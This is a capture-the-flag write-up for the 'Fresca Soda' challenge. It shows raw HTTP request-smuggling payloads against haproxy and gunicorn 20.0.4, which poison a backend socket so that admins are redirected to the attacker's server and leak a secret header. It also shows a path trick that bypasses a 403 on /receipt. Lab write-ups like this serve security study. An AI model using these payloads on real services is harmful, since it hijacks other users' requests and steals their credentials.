Fresca Soda

Fresca soda was a pretty neat HTTP Request Smuggling challenge.

Approaching the app

The main goal here is to to leak the Fresca Soda secret receipt by acessing /receipt. If we try to access directly we, obviously, fail.

if we pay attention to the response header we'll see it's served with gunicorn and haproxy, so would be nice to look for desync vulns.

The version 20.0.4 of gunicorn is vulnerable to TE.CL desync, which means we can poison the server's sockets to tamper other users requests.

The server also has the /back route that redirects the client to the request's host header. If we put together a chain with what we've got so far, we could turn the /back redirect into an open redirect.

The server also has this wierd behavior that allows one to bypass the 403 on /receipt, if we request receipt (without /) otr //receipt (double /) The restrictions are bypassed, probably due to some poor regex.

The server returns 200 but we can't see the flag yet because we need a special header. A nice way of obtaining this header would be to poison thge socket to redirect one of the admins to our server so we can extract the header and replay our request with the secret header.

The exploit

GET / HTTP/1.1
Host: localhost:1080
Content-Length: 76
Sec-Websocket-Key1: x

xxxxxxxxGET /back HTTP/1.1
Host: 172.29.0.1:9001
Content-Length: 35
Foo: X

GET / HTTP/1.1
Host: localhost:1080

If we send the request above we'll be able To consolidate our poisoned request, which is:

GET /back HTTP/1.1
Host: 172.29.0.1:9001
Content-Length: 35
Foo: X

With the next request to the server, so the victim's would look like the following when parsed by the server:

GET /back HTTP/1.1
Host: 172.29.0.1:9001
Content-Length: 35
Foo: XGET / HTTP/1.1
Host: localhost:1080

:9001 is not the actual port of the redirection, it will actually redirect to port 80, the reason is that the servers does a wierd thing to the Location header of the redirection when we have 2 Host headers but appending a dummy port number fixes it.

After sending the payload, whenever an admin browses to the site they will be redirected to my server and potentially leaking the header we need :)

Great! Now it's only a matter of using this header with our previous 403 bypass to dump the flag.

The final request looks like the following:

GET receipt HTTP/1.1

Host: localhost:1080

x-not-heroes-allowed: s3cr3t_h3ad3r_t0_w1n

Finally, the server responds with the flag.

PreviousEsse Esse Erre Effe NextHealthchecker

Last updated 3 years ago

Was this helpful?